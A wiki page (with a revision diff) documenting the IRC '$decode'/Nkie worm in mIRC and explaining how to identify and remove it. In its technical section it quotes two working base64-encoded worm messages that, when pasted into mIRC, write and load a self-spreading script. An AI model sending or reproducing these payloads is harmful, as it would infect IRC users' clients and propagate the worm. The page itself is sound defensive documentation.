Log in | Back to darenet.org

Nkie Worm Removal

(New page: The IRC/Nkie worm is among the top five most common IRC worms today. It is also the least documented worm on the internet. This worm is commonly called the $decode worm on IRC. The origin...)
m
Line 43: Line 43:
This will reveal the file name of the script. All $decode worms will have a load command after the final "|" character. In this case we see that .load -rs Ä is the final command, giving us the file name Ä, or ASCII character 142. You can type this letter by holding down the ALT key and pressing 142 on the numeric pad, then release the ALT key. Regardless of the temptation or promises, do not copy and paste anything in mIRC you do not understand. This worm is a new spin on an old trick. The same thing used to be achieved by getting users to copy endless $chr()characters into the edit box, which will execute any command given as if it was typed normally.
This will reveal the file name of the script. All $decode worms will have a load command after the final "|" character. In this case we see that .load -rs Ä is the final command, giving us the file name Ä, or ASCII character 142. You can type this letter by holding down the ALT key and pressing 142 on the numeric pad, then release the ALT key. Regardless of the temptation or promises, do not copy and paste anything in mIRC you do not understand. This worm is a new spin on an old trick. The same thing used to be achieved by getting users to copy endless $chr()characters into the edit box, which will execute any command given as if it was typed normally.
-
[[Category:Exploits Prevention]]
+
[[Category:Documentation]] [[Category:Exploits Prevention]]

Revision as of 03:53, 28 December 2009

The IRC/Nkie worm is among the top five most common IRC worms today. It is also the least documented worm on the internet.

This worm is commonly called the $decode worm on IRC. The original $decode is a mIRC script named nkie.txt. It is triggered when someone types !list in any channel an infected user is in. The trigger is a simple mIRC code sent encrypted to the person who typed the !list command.

Today there are many variants, all of these spam encrypted mIRC code to anyone that either types a trigger, or joins/parts a channel the infected user is in. Some variants have a timer in the code that waits for a few seconds, then spams the code only if the user is not oped. This is to prevent channel moderators from seeing the spam and kicking the infected user. Most people do not even realize they have this worm until they are kicked from an IRC channel with instructions to join a help channel. To date the worm has no destructive payload, but that could change. As with any worm, care should be taken when removing.

Technical Details

The worm spreads by spamming people over IRC networks with messages similar to these:

<cooleun> hey Golcor to get OPs use this hack in the chan but SHH!
//$decode( d3JpdGUgxCAkcmVhZCgkc2NyaXB0LG4sMSk= ,m) |
$decode( LmxvYWQgLXJzIMQ= ,m)

<^BlueyEBOy^> STOP SPAM, USE THIS COMMAND: //write nospam
$decode(b24gISsxOmpvaW46Izp7IC5hdXNlciAyICRuaWNrIHwgLm1zZy
AkbmljayBTVE9QIFNQQU0sIFVTRSBUSElTIENPTU1BTkQ6AzQgLy93cml0
ZSBub3NwYW0gJCAkKyBkZWNvZGUoICQrICRlbmNvZGUoJHJlYWQoJHNjcm
lwdCxuLDEpLG0pICQrICxtKSAkY2hyKDEyNCkgLmxvYWQgLXJzIG5vc3Bhb
SAkY2hyKDEyNCkgLy9tb2RlICQgJCsgbWUgK1IgfSB9,m) | .load -rs
nospam | //mode $me +R

It works with the $decode() and $encode() methods built into the mIRC scripting language. When a user gets spammed with one of these messages, and then copies the text into the edit box, the text is interpreted by mIRC and executed as if the user had typed the command in plainly. Although the scripts vary on what they say, the theme is the same: They write a small script to the mIRC folder, load it into the remote section of mIRC, and then go to work spamming others, enticing them to copy and paste too. Any name can be given to the file. Some common file names include:

  • Ä
  • chat
  • dab.txt
  • god.dll
  • hack
  • mirc32.ini
  • nkie.txt
  • nospam
  • twg.txt
  • s.txt
  • vv.pif

Solution

Because it is a simple spam worm, removal is easy: Simply unload and delete the script. If you have a lot of scripts loaded you will have to determine which script(s) are spamming. One easy way to do this is to copy the last part of the actual message you are spamming and /echo it back to yourself in the status window. Taking the first example from above, you would copy $decode(LmxvYWQgLXJzIMQ= ,m) to the clipboard. Then in the status window type:

//echo -a . $decode( LmxvYWQgLXJzIMQ= ,m)

This will reveal the file name of the script. All $decode worms will have a load command after the final "|" character. In this case we see that .load -rs Ä is the final command, giving us the file name Ä, or ASCII character 142. You can type this letter by holding down the ALT key and pressing 142 on the numeric pad, then release the ALT key. Regardless of the temptation or promises, do not copy and paste anything in mIRC you do not understand. This worm is a new spin on an old trick. The same thing used to be achieved by getting users to copy endless $chr()characters into the edit box, which will execute any command given as if it was typed normally.